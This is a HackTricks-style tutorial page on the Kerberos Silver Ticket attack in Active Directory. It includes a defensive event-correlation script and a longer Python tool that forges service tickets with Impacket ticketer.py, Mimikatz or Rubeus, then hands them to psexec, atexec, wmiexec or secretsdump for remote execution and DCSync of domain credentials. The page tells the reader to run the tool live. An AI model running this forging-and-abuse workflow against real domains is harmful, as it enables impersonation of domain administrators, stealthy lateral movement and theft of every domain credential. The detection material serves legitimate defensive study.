Silver Ticket
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!
The Silver Ticket attack forges Kerberos service tickets (TGS) in Active Directory (AD) environments. It requires the long-term key of a service account, usually a computer account, in the form of its NTLM hash (RC4 key) or AES key; with that key an attacker can build a Ticket Granting Service (TGS) ticket offline for a specific SPN on that host and present it directly to the service. Because no TGT is requested and the Domain Controller is never contacted, the DC logs nothing, and the service normally does not validate the PAC, so the ticket can claim any user and group membership, typically Domain Admins. The access is limited to the service(s) whose key was obtained on that host, which is what distinguishes it from a Golden Ticket. Forging with the AES key rather than the NTLM hash is preferable: an RC4-encrypted ticket in a domain that otherwise uses AES is an easy detection signal.
Ticket crafting tools depend on the attacker's operating system: on Linux, Impacket's ticketer.py (with -spn for a silver ticket); on Windows, Mimikatz (kerberos::golden with /service and /target) or Rubeus:
The CIFS service is the most common target, since it gives access to the victim's file system, but other services such as HOST and RPCSS can also be abused, for scheduled tasks and WMI queries respectively. The service class(es) needed for each access method:

| Service type | Service silver ticket(s) |
|---|---|
| WMI | HOST, RPCSS |
| PowerShell Remoting | HOST, HTTP (depending on OS also WSMAN, RPCSS) |
| WinRM | HOST, HTTP (in some occasions you can just ask for WINRM) |
| Scheduled Tasks | HOST |
| Windows File Share, also psexec | CIFS |
| LDAP operations, including DCSync | LDAP |
| Windows Remote Server Administration Tools | RPCSS, LDAP, CIFS |
| Golden Tickets | krbtgt |

Using Rubeus (for example with asktgs) you may request tickets for all these services at once with the parameter:
/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm
Silver ticket events: because the forged ticket goes straight to the service and the DC is never contacted, no 4768 (TGT request) or 4769 (TGS request) is generated on the Domain Controller. The only traces appear in the Security log of the target host:
4624: Logon (an account was successfully logged on)
4634: Logoff
4672: Special privileges assigned to new logon (admin logon)
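The absence of DC events is itself the detection opportunity. The following is an added example (not code from HackTricks) that correlates constructed host and DC events: a Kerberos network logon (4624, logon type 3) on a host with no 4769 for that user on any DC within the ticket lifetime is flagged, and a 4672 on the same logon shows the forged PAC carried admin groups. The NetBIOS-versus-DNS domain-name check is a heuristic based on forging-tool defaults; the event records, hostnames and times are made up.

```python
"""Spot Silver Ticket logons by correlating host 4624/4672 with DC 4769 events."""
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample events (not real telemetry): 4769 from the DC, the rest
# from the target host fs01.  Only the fields this check needs are kept.
EVENTS: List[Dict] = [
    {"host": "dc01", "id": 4769, "time": "2024-05-01T09:00:00",
     "user": "jdoe@CORP.LOCAL", "service": "cifs/fs01.corp.local"},
    {"host": "fs01", "id": 4624, "time": "2024-05-01T09:00:05", "user": "jdoe",
     "domain": "CORP", "logon_type": 3, "auth_pkg": "Kerberos", "ip": "10.0.0.15"},
    # Legitimate NTLM logon: not Kerberos, so outside the scope of this check.
    {"host": "fs01", "id": 4624, "time": "2024-05-01T10:00:00", "user": "svc_backup",
     "domain": "CORP", "logon_type": 3, "auth_pkg": "NTLM", "ip": "10.0.0.20"},
    # Forged ticket: Kerberos logon with no 4769 anywhere, plus admin privileges.
    {"host": "fs01", "id": 4624, "time": "2024-05-01T13:20:00", "user": "Administrator",
     "domain": "corp.local", "logon_type": 3, "auth_pkg": "Kerberos", "ip": "10.0.0.99"},
    {"host": "fs01", "id": 4672, "time": "2024-05-01T13:20:00", "user": "Administrator",
     "domain": "corp.local"},
    {"host": "fs01", "id": 4634, "time": "2024-05-01T13:25:00", "user": "Administrator",
     "domain": "corp.local"},
]


def _t(stamp: str) -> datetime:
    return datetime.fromisoformat(stamp)


def find_silver_ticket_candidates(events: List[Dict], netbios_domain: str = "CORP",
                                  ticket_lifetime: timedelta = timedelta(hours=10)) -> List[Dict]:
    """Return the Kerberos 4624 events that look like forged service-ticket logons."""
    # Index TGS issuance on the DC by the user name part of user@REALM.
    tgs_times: Dict[str, List[datetime]] = {}
    for e in events:
        if e["id"] == 4769:
            tgs_times.setdefault(e["user"].split("@")[0].lower(), []).append(_t(e["time"]))
    admin_logons = {(e["host"], e["user"].lower(), e["time"]) for e in events if e["id"] == 4672}

    findings = []
    for e in events:
        if e["id"] != 4624 or e.get("auth_pkg") != "Kerberos" or e.get("logon_type") != 3:
            continue
        when = _t(e["time"])
        user = e["user"].lower()
        reasons = []
        # A genuine Kerberos logon needs a TGS issued for that user by a DC beforehand.
        if not any(when - ticket_lifetime <= t <= when for t in tgs_times.get(user, [])):
            reasons.append("no 4769 on any DC within ticket lifetime")
        # Heuristic: forging tools default to the DNS domain name, Windows logs NetBIOS.
        if e.get("domain", "").upper() != netbios_domain.upper():
            reasons.append(f"domain field {e.get('domain')!r} is not the NetBIOS name")
        if (e["host"], user, e["time"]) in admin_logons:
            reasons.append("4672 special privileges assigned on the same logon")
        if reasons:
            findings.append({"host": e["host"], "user": e["user"], "ip": e["ip"],
                             "time": e["time"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_silver_ticket_candidates(EVENTS):
        print(f"{f['time']} {f['host']} {f['user']} from {f['ip']}: " + "; ".join(f["reasons"]))
```

The correlation only works if the logs of every DC are collected centrally, since the TGS can be issued by any of them; a missing 4769 on a single DC proves nothing on its own.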
In the following examples let's imagine that the ticket was forged impersonating the Administrator account.
CIFS: with this ticket you will be able to access the C$ and ADMIN$ shares via SMB (if they are exposed) and copy files to a part of the remote filesystem just by doing something like:
You will also be able to obtain a shell inside the host or execute arbitrary commands using psexec:
PsExec/Winexec/ScExec
HOST: with this permission you can create scheduled tasks on remote computers and execute arbitrary commands:
HOST + RPCSS: with these tickets you can execute WMI in the victim system:
Find more information about wmiexec in the following page:
WmiExec
HOST + HTTP/WSMAN (WinRM): with winrm access over a computer you can access it and even get a PowerShell:
Check the following page to learn more ways to connect with a remote host using winrm:
WinRM
Note that winrm must be active and listening on the remote computer to access it.
LDAP: with this privilege you can dump the DC database using DCSync:
Learn more about DCSync in the following page:
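The ticket-crafting step and the abuse examples above (CIFS, HOST, HOST + RPCSS, LDAP) share the same workflow: forge a ticket for one SPN, then hand the ccache to the tool that speaks that service. The following is an added example, not code from HackTricks or from Impacket, Mimikatz or Rubeus; it only reproduces those tools' real command-line syntax. It validates the inputs a forger needs (a domain SID without a RID, a 32-hex NT hash or a 32/64-hex AES key), builds the equivalent ticketer.py, Mimikatz and Rubeus invocations, and selects the Impacket tool for the chosen service (the service-to-tool mapping is my assumption based on the table above). The domain, SID, hostnames and hash are made up.

```python
"""Forge a Silver Ticket and hand it to the matching Impacket tool."""
import os
import re
import shlex
import shutil
import subprocess
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

DOMAIN_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+$")  # domain SID, no trailing RID
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")

# Assumed mapping from SPN class to the Impacket tool that consumes the ticket.
TOOL_FOR_SERVICE: Dict[str, str] = {
    "cifs": "psexec.py",       # file shares and psexec-style execution
    "host": "atexec.py",       # scheduled tasks
    "rpcss": "wmiexec.py",     # WMI (needs a HOST ticket as well)
    "ldap": "secretsdump.py",  # DCSync against a DC
}


@dataclass
class SilverTicket:
    domain: str                    # e.g. corp.local
    domain_sid: str                # S-1-5-21-...
    target: str                    # FQDN of the host whose service key we hold
    service: str                   # SPN class: cifs, host, rpcss, ldap, http, wsman
    user: str = "Administrator"    # the user the forged PAC claims
    nthash: Optional[str] = None   # RC4 key: NT hash of the service account
    aes_key: Optional[str] = None  # AES128 (32 hex) or AES256 (64 hex) key

    def __post_init__(self) -> None:
        self.service = self.service.lower()
        if not DOMAIN_SID_RE.match(self.domain_sid):
            raise ValueError("domain_sid must be the domain SID without a RID")
        if (self.nthash is None) == (self.aes_key is None):
            raise ValueError("give exactly one of nthash or aes_key")
        if self.nthash and not (len(self.nthash) == 32 and HEX_RE.match(self.nthash)):
            raise ValueError("nthash must be 32 hex characters")
        if self.aes_key and not (len(self.aes_key) in (32, 64) and HEX_RE.match(self.aes_key)):
            raise ValueError("aes_key must be 32 (AES128) or 64 (AES256) hex characters")

    @property
    def spn(self) -> str:
        return f"{self.service}/{self.target}"

    @property
    def ccache(self) -> str:
        # ticketer.py writes <user>.ccache into the working directory
        return os.path.abspath(f"{self.user}.ccache")

    def _key_flag(self) -> str:
        # Mimikatz and Rubeus use /rc4:, /aes128: or /aes256: for the forging key
        if self.nthash:
            return f"/rc4:{self.nthash}"
        return f"/aes{len(self.aes_key) * 4}:{self.aes_key}"

    def ticketer_argv(self) -> List[str]:
        """Impacket (Linux): ticketer.py -nthash|-aesKey ... -spn SPN user"""
        key = ["-nthash", self.nthash] if self.nthash else ["-aesKey", self.aes_key]
        return ["ticketer.py", *key, "-domain-sid", self.domain_sid,
                "-domain", self.domain, "-spn", self.spn, self.user]

    def mimikatz_cmd(self) -> str:
        """Mimikatz (Windows): kerberos::golden with /service and /target, injected with /ptt."""
        return (f"kerberos::golden /domain:{self.domain} /sid:{self.domain_sid} "
                f"{self._key_flag()} /user:{self.user} /service:{self.service} "
                f"/target:{self.target} /ptt")

    def rubeus_cmd(self) -> str:
        """Rubeus (Windows): silver command, injected with /ptt."""
        return (f"Rubeus.exe silver /service:{self.spn} {self._key_flag()} "
                f"/sid:{self.domain_sid} /domain:{self.domain} /user:{self.user} /ptt")

    def use_argv(self, command: Optional[str] = None) -> Tuple[List[str], Dict[str, str]]:
        """argv and environment (KRB5CCNAME) for the Impacket tool matching the SPN."""
        tool = TOOL_FOR_SERVICE.get(self.service)
        if tool is None:
            raise ValueError(f"no Impacket tool mapped for service {self.service}")
        argv = [tool, "-k", "-no-pass"]
        if tool == "secretsdump.py":
            argv.append("-just-dc")  # DCSync only, skip SAM/LSA
        argv.append(f"{self.domain}/{self.user}@{self.target}")
        if tool in ("atexec.py", "wmiexec.py") and command:
            argv.append(command)
        return argv, dict(os.environ, KRB5CCNAME=self.ccache)

    def forge(self, dry_run: bool = True) -> int:
        """Run ticketer.py when it is on PATH; otherwise print the three equivalent commands."""
        argv = self.ticketer_argv()
        if dry_run or shutil.which(argv[0]) is None:
            print(shlex.join(argv))
            print(self.mimikatz_cmd())
            print(self.rubeus_cmd())
            return 0
        return subprocess.run(argv, check=False).returncode


if __name__ == "__main__":
    # Made-up lab values: a file server whose computer-account NT hash was dumped.
    t = SilverTicket(domain="corp.local", domain_sid="S-1-5-21-1111111111-2222222222-3333333333",
                     target="fs01.corp.local", service="cifs", nthash="0123456789abcdef0123456789abcdef")
    t.forge(dry_run=True)
    argv, env = t.use_argv()
    print(shlex.join(argv), "with KRB5CCNAME=" + env["KRB5CCNAME"])
```

Run it with dry_run=False on a box with Impacket installed to actually write Administrator.ccache; the HTTP/WSMAN (WinRM) case is deliberately left out of the mapping because Impacket has no WinRM client, so that ticket is used from a Windows host or with another tool.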